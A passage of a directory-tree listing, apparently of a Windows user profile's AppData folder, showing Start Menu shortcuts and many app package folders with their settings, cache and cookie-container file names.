│   │       │   │   │   │           ├── 07 - Event Viewer.lnk
│   │       │   │   │   │           ├── 08 - PowerAndSleep.lnk
│   │       │   │   │   │           ├── 09 - Mobility Center.lnk
│   │       │   │   │   │           ├── 10 - AppsAndFeatures.lnk
│   │       │   │   │   │           └── desktop.ini
│   │       │   │   │   └── Windows Sidebar
│   │       │   │   │       └── settings.ini
│   │       │   │   ├── Packages
│   │       │   │   │   ├── 1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.549981C3F5F10_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.AccountsControl_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.AsyncTextService_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.BingWeather_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.BioEnrollment_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.CredDialogHost_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.DesktopAppInstaller_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.ECApp_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Edge.GameAssist_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.GetHelp_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Getstarted_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.HEIFImageExtension_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.LockApp_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Microsoft3DViewer_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.MicrosoftEdge_8wekyb3d8bbwe
│   │       │   │   │   │   ├── LocalState
│   │       │   │   │   │   │   └── PinnedTiles
│   │       │   │   │   │   │       ├── 26310719480
│   │       │   │   │   │   │       │   ├── squaretile.png
│   │       │   │   │   │   │       │   └── tinytile.png
│   │       │   │   │   │   │       ├── 38975140460
│   │       │   │   │   │   │       │   ├── squaretile.png
│   │       │   │   │   │   │       │   └── tinytile.png
│   │       │   │   │   │   │       ├── 6501008900
│   │       │   │   │   │   │       │   ├── squaretile.png
│   │       │   │   │   │   │       │   └── tinytile.png
│   │       │   │   │   │   │       └── 7603651830
│   │       │   │   │   │   │           ├── squaretile.png
│   │       │   │   │   │   │           └── tinytile.png
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe
│   │       │   │   │   │   ├── AC
│   │       │   │   │   │   │   ├── AppCache
│   │       │   │   │   │   │   │   ├── container.dat
│   │       │   │   │   │   │   │   └── L074QDVK
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   ├── INetCache
│   │       │   │   │   │   │   │   ├── container.dat
│   │       │   │   │   │   │   │   └── MSIMGSIZ.DAT
│   │       │   │   │   │   │   ├── INetCookies
│   │       │   │   │   │   │   │   └── ESE
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   └── Microsoft
│   │       │   │   │   │   │       ├── CryptnetUrlCache
│   │       │   │   │   │   │       │   ├── Content
│   │       │   │   │   │   │       │   │   ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │       │   │   ├── 7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
│   │       │   │   │   │   │       │   │   ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │       │   │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
│   │       │   │   │   │   │       │   │   └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   │       │   └── MetaData
│   │       │   │   │   │   │       │       ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │       │       ├── 7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
│   │       │   │   │   │   │       │       ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │       │       ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
│   │       │   │   │   │   │       │       └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   │       └── Internet Explorer
│   │       │   │   │   │   │           └── DOMStore
│   │       │   │   │   │   │               ├── container.dat
│   │       │   │   │   │   │               └── QCWD23FV
│   │       │   │   │   │   │                   └── www.office[1].xml
│   │       │   │   │   │   ├── Settings
│   │       │   │   │   │   │   ├── roaming.lock
│   │       │   │   │   │   │   ├── settings.dat
│   │       │   │   │   │   │   ├── settings.dat.LOG1
│   │       │   │   │   │   │   └── settings.dat.LOG2
│   │       │   │   │   │   └── SystemAppData
│   │       │   │   │   │       └── Helium
│   │       │   │   │   │           ├── UserClasses.dat
│   │       │   │   │   │           ├── UserClasses.dat.LOG1
│   │       │   │   │   │           ├── UserClasses.dat.LOG2
│   │       │   │   │   │           ├── User.dat
│   │       │   │   │   │           ├── User.dat.LOG1
│   │       │   │   │   │           └── User.dat.LOG2
│   │       │   │   │   ├── Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.MixedReality.Portal_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.MSPaint_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Office.OneNote_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.People_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.ScreenSketch_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.SkypeApp_kzf8qxf38zg5c
│   │       │   │   │   │   ├── LocalState
│   │       │   │   │   │   │   └── DiagOutputDir
│   │       │   │   │   │   │       └── SkypeApp0.txt
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.StorePurchaseApp_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.VP9VideoExtensions_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Wallet_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.WebMediaExtensions_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.WebpImageExtension_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Win32WebViewHost_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.WindowsAlarms_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.WindowsCalculator_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Windows.CallingShellApp_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.WindowsCamera_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Windows.CapturePicker_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── MicrosoftWindows.Client.CBS_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── microsoft.windowscommunicationsapps_8wekyb3d8bbwe
│   │       │   │   │   │   ├── AC
│   │       │   │   │   │   │   ├── INetCache
│   │       │   │   │   │   │   │   └── container.dat
│   │       │   │   │   │   │   ├── INetCookies
│   │       │   │   │   │   │   │   └── ESE
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   ├── INetHistory
│   │       │   │   │   │   │   │   └── BackgroundTransferApi
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   └── Microsoft
│   │       │   │   │   │   │       └── CryptnetUrlCache
│   │       │   │   │   │   │           ├── Content
│   │       │   │   │   │   │           │   ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │           │   ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │           │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
│   │       │   │   │   │   │           │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
│   │       │   │   │   │   │           │   └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   │           └── MetaData
│   │       │   │   │   │   │               ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │               ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │               ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
│   │       │   │   │   │   │               ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
│   │       │   │   │   │   │               └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   ├── LocalState
│   │       │   │   │   │   │   ├── HxCommAlwaysOnLog.etl
│   │       │   │   │   │   │   ├── HxCommAlwaysOnLog_Old.etl
│   │       │   │   │   │   │   └── HxStore.hxd
│   │       │   │   │   │   ├── Settings
│   │       │   │   │   │   │   ├── roaming.lock
│   │       │   │   │   │   │   ├── settings.dat
│   │       │   │   │   │   │   ├── settings.dat.LOG1
│   │       │   │   │   │   │   └── settings.dat.LOG2
│   │       │   │   │   │   └── TempState
│   │       │   │   │   │       └── universal_outlook_test.dat64
│   │       │   │   │   ├── Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
│   │       │   │   │   │   ├── AC
│   │       │   │   │   │   │   ├── BackgroundTransferApi
│   │       │   │   │   │   │   │   ├── 3cb9dc34-7f4e-426b-9643-9716e31589c5.up_meta_body
│   │       │   │   │   │   │   │   ├── 3cb9dc34-7f4e-426b-9643-9716e31589c5.up_meta_secure
│   │       │   │   │   │   │   │   ├── 8e4b2165-4a7e-4c08-8541-6349a0032215.up_meta_body
│   │       │   │   │   │   │   │   ├── 8e4b2165-4a7e-4c08-8541-6349a0032215.up_meta_secure
│   │       │   │   │   │   │   │   ├── fd424c1e-420b-4435-a6d2-e5f90635970b.ad97e245-2ad6-4ca3-bf95-85657940236f.down_meta
│   │       │   │   │   │   │   │   ├── fd424c1e-420b-4435-a6d2-e5f90635970b.up_meta_body
│   │       │   │   │   │   │   │   └── fd424c1e-420b-4435-a6d2-e5f90635970b.up_meta_secure
│   │       │   │   │   │   │   ├── INetCache
│   │       │   │   │   │   │   │   └── container.dat
│   │       │   │   │   │   │   ├── INetCookies
│   │       │   │   │   │   │   │   └── ESE
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   ├── INetHistory
│   │       │   │   │   │   │   │   └── BackgroundTransferApi
│   │       │   │   │   │   │   │       └── container.dat
│   │       │   │   │   │   │   ├── Microsoft
│   │       │   │   │   │   │   │   └── CryptnetUrlCache
│   │       │   │   │   │   │   │       ├── Content
│   │       │   │   │   │   │   │       │   ├── 26C212D9399727259664BDFCA073966E_D53C01423A36DBCEB0BB7256A7DA6D8C
│   │       │   │   │   │   │   │       │   ├── 26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
│   │       │   │   │   │   │   │       │   ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │   │       │   ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │   │       │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
│   │       │   │   │   │   │   │       │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
│   │       │   │   │   │   │   │       │   ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
│   │       │   │   │   │   │   │       │   └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   │   │       └── MetaData
│   │       │   │   │   │   │   │           ├── 26C212D9399727259664BDFCA073966E_D53C01423A36DBCEB0BB7256A7DA6D8C
│   │       │   │   │   │   │   │           ├── 26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
│   │       │   │   │   │   │   │           ├── 57C8EDB95DF3F0AD4EE2DC2B8CFD4157
│   │       │   │   │   │   │   │           ├── 77EC63BDA74BD0D0E0426DC8F8008506
│   │       │   │   │   │   │   │           ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
│   │       │   │   │   │   │   │           ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
│   │       │   │   │   │   │   │           ├── E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
│   │       │   │   │   │   │   │           └── FB0D848F74F70BB2EAA93746D24D9749
│   │       │   │   │   │   │   └── TokenBroker
│   │       │   │   │   │   │       └── Cache
│   │       │   │   │   │   │           └── e71e1300703d5395820e448840a760f0dd25ad50.tbres
│   │       │   │   │   │   ├── LocalState
│   │       │   │   │   │   │   ├── Assets
│   │       │   │   │   │   │   │   ├── 02d10d8f3b2550b1ef1c26446560bb701c8a38270558a230195db09392dbb207
│   │       │   │   │   │   │   │   ├── 1b6b994d653423a674aeb2213068072d7fbd3b2de7511b3d75fe58d953901860
│   │       │   │   │   │   │   │   ├── 1bc2e50e2dab3ff16f3d289afb04281306bed4f817cec80a9eb6f302292e2a6a
│   │       │   │   │   │   │   │   ├── 3783e7d9aee4122ca0a40a8f1a32a54ec18e6f61ac6fe1ddb07b3a4d2bb898aa
│   │       │   │   │   │   │   │   ├── 3cc9a5f5fec19fa4cfca8c9a62ff6b4f1a7e8f2b45f9b870e7daa5e68d15431b
│   │       │   │   │   │   │   │   ├── 4423c0d12ebdc13f423b7dfa25eecdad278e7371293ecb24efab3f61e77049e9
│   │       │   │   │   │   │   │   ├── 4d37196bc735aaeee1b7479ffd7be02fd8efaaa4175d538e592c451486a1643c
│   │       │   │   │   │   │   │   ├── 6694292562b8278f722fccadbe11f33bd66a4e3eb075a2783d9a5c5736738099
│   │       │   │   │   │   │   │   ├── 69c1396ff9592af94573feb42ae3763ac712340177111ad444dac2501cd303e8
│   │       │   │   │   │   │   │   ├── 70ff3d4a131ad5bd7be00ef0175c91a5db687ae5ad4c96d06a69d2085a72ec4c
│   │       │   │   │   │   │   │   ├── 7477d48bb633a6c9c45446f7deaf54d80b38ebdd01c97d7768cd5c6a573b540e
│   │       │   │   │   │   │   │   ├── 74a3fd35b829e52e6ca53adb996dd9ebc370f7d1d5f6ad09308d8fbfac3ef454
│   │       │   │   │   │   │   │   ├── 8d1ede54523e34abc7b5e1dcacd6d6a96126a36aff6feea9ff742ad48ab03691
│   │       │   │   │   │   │   │   ├── 9511e5e0a9d328dc1aceabc9e9eef27035aa872d65a5e2a1f519204e75e017e6
│   │       │   │   │   │   │   │   ├── a8d31612d431801fb8a0f122984cb10e29b4e9e4ccd321cfff6287a2f23e6d16
│   │       │   │   │   │   │   │   ├── abb1f70cf97e717ea0fdb4f61f95cbe3abd8af680315bd2406a7c75fd0b9e2f9
│   │       │   │   │   │   │   │   ├── df0d0984d439371960407f90ea85fb0ccfd3c500d5bb9a55eb375305d2a3b0e3
│   │       │   │   │   │   │   │   └── e390c6b4c387ef93f030c31ab1227231cd8bba700a754e3008f7dc4205b1ffaa
│   │       │   │   │   │   │   ├── ContentManagementSDK
│   │       │   │   │   │   │   │   └── Creatives
│   │       │   │   │   │   │   │       ├── 202914
│   │       │   │   │   │   │   │       │   ├── 1755293232
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 280810
│   │       │   │   │   │   │   │       │   ├── 1755293233
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 280811
│   │       │   │   │   │   │   │       │   ├── 1755293233
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 280815
│   │       │   │   │   │   │   │       │   ├── 1755294915
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 310091
│   │       │   │   │   │   │   │       │   ├── 1755294016
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 310093
│   │       │   │   │   │   │   │       │   ├── 1755293089
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 314559
│   │       │   │   │   │   │   │       │   ├── 1755293091
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 338387
│   │       │   │   │   │   │   │       │   ├── 1755294915
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 338388
│   │       │   │   │   │   │   │       │   ├── 1755711455
│   │       │   │   │   │   │   │       │   ├── 1755711469
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 338389
│   │       │   │   │   │   │   │       │   ├── 1755294016
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 353694
│   │       │   │   │   │   │   │       │   ├── 1755295235
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 353698
│   │       │   │   │   │   │   │       │   ├── 1755293234
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 88000045
│   │       │   │   │   │   │   │       │   ├── 1755294915
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 88000161
│   │       │   │   │   │   │   │       │   ├── 1755293235
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 88000163
│   │       │   │   │   │   │   │       │   ├── 1755293235
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       ├── 88000165
│   │       │   │   │   │   │   │       │   ├── 1755293236
│   │       │   │   │   │   │   │       │   ├── eventbeacons.dat
│   │       │   │   │   │   │   │       │   └── imprbeacons.dat
│   │       │   │   │   │   │   │       └── onesettings_waas_featuremanagement
│   │       │   │   │   │   │   │           ├── eventbeacons.dat
│   │       │   │   │   │   │   │           └── imprbeacons.dat
│   │       │   │   │   │   │   └── TargetedContentCache
│   │       │   │   │   │   │       └── v3
│   │       │   │   │   │   │           ├── 202914
│   │       │   │   │   │   │           │   └── 33d8242400b04f2e80ee4d816436b7c1_1
│   │       │   │   │   │   │           ├── 280810
│   │       │   │   │   │   │           │   └── 300141ca5a7e4ffba3907ec72da19b87_1
│   │       │   │   │   │   │           ├── 280811
│   │       │   │   │   │   │           │   └── 0b1bdfb5c36c4a8091ba720eb0e18f98_1
│   │       │   │   │   │   │           ├── 280815
│   │       │   │   │   │   │           │   └── a57f9c60b1844fa8bf882ca8cb0b6a9d_1
│   │       │   │   │   │   │           ├── 310091
│   │       │   │   │   │   │           │   └── 1b3ef5fe7363440a82081ea99dc49245_1
│   │       │   │   │   │   │           ├── 314559
│   │       │   │   │   │   │           │   ├── 794e729e90bf435d8428068ed135eec2_1
│   │       │   │   │   │   │           │   └── ec6021da066143f390fad8a1e91d813c_1
│   │       │   │   │   │   │           ├── 338387
│   │       │   │   │   │   │           │   ├── 5570d9a7dd8c48ccb199b57f9330290c_1
│   │       │   │   │   │   │           │   ├── 61b011354cc24a59aacbef6f5a706794_1
│   │       │   │   │   │   │           │   └── d828356c2b92448882c0af5d4241ffa7_1
│   │       │   │   │   │   │           ├── 338388
│   │       │   │   │   │   │           │   └── ec06d6f16b254ddbbc331cfbcde4318d_1
│   │       │   │   │   │   │           ├── 338389
│   │       │   │   │   │   │           │   └── 56c3b098abed495fbb78d15ffabbf18f_1
│   │       │   │   │   │   │           ├── 353698
│   │       │   │   │   │   │           │   └── 1fce59339cfb42abbd7562eccb2571ec_1
│   │       │   │   │   │   │           ├── 88000045
│   │       │   │   │   │   │           │   └── 895b1f6f08954731aed20e1f50664212_1
│   │       │   │   │   │   │           ├── 88000161
│   │       │   │   │   │   │           │   └── 9edd036068944692b3b0f386bacfe26e_1
│   │       │   │   │   │   │           ├── 88000163
│   │       │   │   │   │   │           │   └── 900bf22aa608441eb406fb99541832fe_1
│   │       │   │   │   │   │           └── 88000165
│   │       │   │   │   │   │               └── f2185c14748648adb3c14ad88cebd930_1
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       ├── settings.dat
│   │       │   │   │   │       ├── settings.dat.LOG1
│   │       │   │   │   │       └── settings.dat.LOG2
│   │       │   │   │   ├── Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.WindowsMaps_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
│   │       │   │   │   ├── Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe
│   │       │   │   │   │   └── Settings
│   │       │   │   │   │       ├── roaming.lock
│   │       │   │   │   │       └── settings.dat
